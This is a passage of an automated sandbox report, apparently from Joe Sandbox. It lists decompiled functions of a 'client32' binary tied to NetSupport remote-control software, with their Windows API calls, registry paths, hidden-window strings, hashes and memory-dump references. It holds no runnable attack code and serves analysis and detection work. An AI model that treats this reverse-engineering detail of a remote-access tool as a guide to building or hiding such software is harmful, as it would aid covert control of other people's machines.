                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 11023A09
                                                                                • CheckMenuItem.USER32(00000000,000013EB,?), ref: 11023A29
                                                                                • GetDlgItem.USER32(?,000013B2), ref: 11023A3C
                                                                                • GetWindowRect.USER32(00000000), ref: 11023A43
                                                                                • PostMessageA.USER32(?,00000111,?,00000000), ref: 11023A99
                                                                                • DestroyMenu.USER32(?,?,00000000,00000000,00000102,?,?,?,00000000), ref: 11023AA3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Menu$Window$Item$CheckShow$BringDestroyIconicLoadMessagePostRect
                                                                                • String ID: AddToJournal$Chat
                                                                                • API String ID: 693070851-2976406578
                                                                                • Opcode ID: 4e8affa197535ad0660103244a90f227890d3a0ada2779ccdef05f8d718aa204
                                                                                • Instruction ID: 808c1e48a155f27d2b3c0586fadc3707d2cf985dccefb9094def5a9ab05a8e38
                                                                                • Opcode Fuzzy Hash: 4e8affa197535ad0660103244a90f227890d3a0ada2779ccdef05f8d718aa204
                                                                                • Instruction Fuzzy Hash: 58A10334F44616ABDB08CF64CC85FAEB3E9AB8C704F50452DE6569F6C0DBB4A900CB95
                                                                                Function 110A1460 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 285timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A
                                                                                  • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                  • Part of subcall function 110D15C0: wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • GetLocalTime.KERNEL32(?), ref: 110A1778
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitLastLocalMessageProcessTime__strdup_freewsprintfwvsprintf
                                                                                • String ID: %s\$%s\%s$%s_$CLASSID=$IsA()$LESSON=$[JNL] MakeFileName ret %s$\/:*?"<>|$_%04d_%02d_%02d_%02d%02d$_%s$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                • API String ID: 2014016395-1677429133
                                                                                • Opcode ID: f40b352dcf41bf990ef8532e9d61be92d2988391912dd2b6e0b8644578a58059
                                                                                • Instruction ID: aef08c5c19416ca6c78363d8fb1b9fc7de7af93cef0e20b47086b6b370679a0b
                                                                                • Opcode Fuzzy Hash: f40b352dcf41bf990ef8532e9d61be92d2988391912dd2b6e0b8644578a58059
                                                                                • Instruction Fuzzy Hash: 44B1AF79E00229ABDB15DBA4DD41FEDB7F5AF59388F0441D4E80A67280EB307B44CEA5
                                                                                Function 11131320 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 187COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,11139C95,00000000), ref: 11131428
                                                                                • ShowWindow.USER32(00000000,00000000,?,11139C95,00000000), ref: 11131457
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastShowWindow
                                                                                • String ID: #32770$Client$Hidden$StatusMode$UI.CPP$gUI.hidden_window
                                                                                • API String ID: 3252650109-4091810678
                                                                                • Opcode ID: 0ae299210a7d0d5a262dbccdfbf7f866bd70b7d9559bf6e9f26038e806d2e655
                                                                                • Instruction ID: 1b40a51cdbaebc86ba70b46d463032212dc909346aab7ab50ce078dfded898e8
                                                                                • Opcode Fuzzy Hash: 0ae299210a7d0d5a262dbccdfbf7f866bd70b7d9559bf6e9f26038e806d2e655
                                                                                • Instruction Fuzzy Hash: 2161D571B84325ABE711CF90CC85F69F774E784B29F104129F625AB2C4EBB56940CB84
                                                                                Function 110F7300 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 137libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(Wtsapi32.dll,1B702977,1102E747,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110F732D
                                                                                • GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7372
                                                                                • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F73C3
                                                                                • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F73D8
                                                                                • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F73FD
                                                                                • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7412
                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7423
                                                                                • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7440
                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7451
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressErrorLastLibraryProc$Free$Load
                                                                                • String ID: WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
                                                                                • API String ID: 2188719708-2019804778
                                                                                • Opcode ID: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
                                                                                • Instruction ID: 4e6ae02227e90de241cbe6e1e3770e4d50810e342ffe13a4e1f679076b39a632
                                                                                • Opcode Fuzzy Hash: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
                                                                                • Instruction Fuzzy Hash: 49511371D4121AEFDB14DFD9D9C5AAEFBF5FB48300F51846AE829E3600DB34A9018B61
                                                                                Function 110278D0 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 136threadwindowsleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 11089560: UnhookWindowsHookEx.USER32(?), ref: 11089583
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 11027914
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000001F4), ref: 11027983
                                                                                • PostMessageA.USER32(00040310,00000501,00000000,00000000), ref: 110279A0
                                                                                • SetEvent.KERNEL32(00000270), ref: 110279B1
                                                                                • Sleep.KERNEL32(00000032), ref: 110279B9
                                                                                • PostMessageA.USER32(00040310,00000800,00000000,00000000), ref: 110279EE
                                                                                • GetCurrentThreadId.KERNEL32 ref: 11027A1A
                                                                                • GetThreadDesktop.USER32(00000000), ref: 11027A21
                                                                                • SetThreadDesktop.USER32(00000000), ref: 11027A2A
                                                                                • CloseDesktop.USER32(00000000), ref: 11027A35
                                                                                • CloseHandle.KERNEL32(00000428), ref: 11027A75
                                                                                  • Part of subcall function 11110DE0: GetCurrentThreadId.KERNEL32 ref: 11110E76
                                                                                  • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
                                                                                  • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
                                                                                  • Part of subcall function 11110DE0: EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
                                                                                  • Part of subcall function 11110DE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Thread$CriticalDesktopEventSection$CloseCreateCurrentInitializeMessagePost$EnterHandleHookMultipleObjectsSleepUnhookWaitWindows_malloc_memsetwsprintf
                                                                                • String ID: Async
                                                                                • API String ID: 3276504616-2933828738
                                                                                • Opcode ID: 6cee38a70aae2f38755eebf98c3c7587f70e735ab38d84b72a1d7921366109c4
                                                                                • Instruction ID: e67d87833e8f5e22c8d898940d2622bc971bcbde67a649a31d645776c06e00d8
                                                                                • Opcode Fuzzy Hash: 6cee38a70aae2f38755eebf98c3c7587f70e735ab38d84b72a1d7921366109c4
                                                                                • Instruction Fuzzy Hash: 1441DF74B427259BE705DFE4C884B6AF7A8BB54718F000178E921DB688EB70A900CB91
                                                                                Function 1103F520 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 126windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                  • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                  • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                  • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                  • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                • GetDlgItem.USER32(?,00000472), ref: 1103F557
                                                                                  • Part of subcall function 11160450: SetPropA.USER32(00000000,00000000,00000000), ref: 1116046E
                                                                                  • Part of subcall function 11160450: SetWindowLongA.USER32(00000000,000000FC,1115FE60), ref: 1116047F
                                                                                • wsprintfA.USER32 ref: 1103F5D1
                                                                                • GetSystemMenu.USER32(?,00000000), ref: 1103F5F6
                                                                                • EnableMenuItem.USER32(00000000,0000F060,00000002), ref: 1103F604
                                                                                • SetWindowPos.USER32(00000000,00000001,00000000,00000000,00000000,00000000,00000003), ref: 1103F663
                                                                                • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1103F692
                                                                                • MessageBeep.USER32(00000000), ref: 1103F696
                                                                                  • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                  • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                  • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$Item$FolderMenuPath$BeepEnableFileLongMessageModuleNameObjectPropRectShowSystemTextwsprintf
                                                                                • String ID: %sblockapp.jpg$BlockedAppFile$Client$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                • API String ID: 1300213680-78349004
                                                                                • Opcode ID: d5c730e152b545e79a5963070a614e137598c0869bf15a99c767d92fa3b08f3b
                                                                                • Instruction ID: 6f07d7162ed8c172429d77206b5c6f615c65d6256772802cbf9fe3e1e633a07a
                                                                                • Opcode Fuzzy Hash: d5c730e152b545e79a5963070a614e137598c0869bf15a99c767d92fa3b08f3b
                                                                                • Instruction Fuzzy Hash: 0641EE757403197FD720DBA4CC86FDAF3A4AB48B08F104568F3666B5C0DAB0B980CB55
                                                                                Function 1105F200 Relevance: 19.9, APIs: 3, Strings: 10, Instructions: 368COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • wsprintfA.USER32 ref: 1105F251
                                                                                • wsprintfA.USER32 ref: 1105F265
                                                                                  • Part of subcall function 110ED570: RegCreateKeyExA.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,1105F29C,?,00000000,?,00000000,76968400,?,?,1105F29C,80000001), ref: 110ED59B
                                                                                  • Part of subcall function 110ED520: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C
                                                                                • wsprintfA.USER32 ref: 1105F5D6
                                                                                  • Part of subcall function 110ED180: RegEnumKeyExA.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,00000000,?,00000000), ref: 110ED1CB
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$ExitProcess$CreateEnumErrorLastMessageOpen_strrchr
                                                                                • String ID: %s\%s$ConfigList$General\ProductId$IsA()$NetSupport School$NetSupport School Pro$Software\Classes\VirtualStore\MACHINE\%s\%s\ConfigList$Software\NetSupport Ltd$Software\Productive Computer Insight$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                • API String ID: 273891520-33395967
                                                                                • Opcode ID: 144e512998ce06086377d7856f386d7a7ba87abc4e9c3983cefc13e406a89c1b
                                                                                • Instruction ID: 955d7069f5cd37ed2049fe2a08fe06563fb7c7f4ee9c814884e1c508eb43a074
                                                                                • Opcode Fuzzy Hash: 144e512998ce06086377d7856f386d7a7ba87abc4e9c3983cefc13e406a89c1b
                                                                                • Instruction Fuzzy Hash: D2E16079E0122DABDB56DB55CC94FEDB7B8AF58758F4040C8E50977280EA306B84CF61
                                                                                Function 11059B00 Relevance: 19.7, APIs: 13, Instructions: 243windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 11059C29
                                                                                • CombineRgn.GDI32(00000000,00000000,00000000,00000002), ref: 11059C3A
                                                                                • DeleteObject.GDI32(?), ref: 11059C4B
                                                                                • PostMessageA.USER32(00040310,00000800,00000000,00000000), ref: 11059CB6
                                                                                • GetCursorPos.USER32(?), ref: 11059CED
                                                                                  • Part of subcall function 110585A0: GetTickCount.KERNEL32 ref: 11058616
                                                                                  • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004C), ref: 1109599E
                                                                                  • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004D), ref: 110959A7
                                                                                  • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004E), ref: 110959AE
                                                                                  • Part of subcall function 11095990: GetSystemMetrics.USER32(00000000), ref: 110959B7
                                                                                  • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004F), ref: 110959BD
                                                                                  • Part of subcall function 11095990: GetSystemMetrics.USER32(00000001), ref: 110959C5
                                                                                • GetDC.USER32(00000000), ref: 11059CBE
                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 11059CCB
                                                                                • SetPixel.GDI32(00000000,00000000,00000000,00000000), ref: 11059CD7
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 11059CE0
                                                                                • GetSystemMetrics.USER32(0000004C), ref: 11059D2B
                                                                                • GetSystemMetrics.USER32(0000004D), ref: 11059D31
                                                                                • GetTickCount.KERNEL32 ref: 11059D9D
                                                                                • _free.LIBCMT ref: 11059E20
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
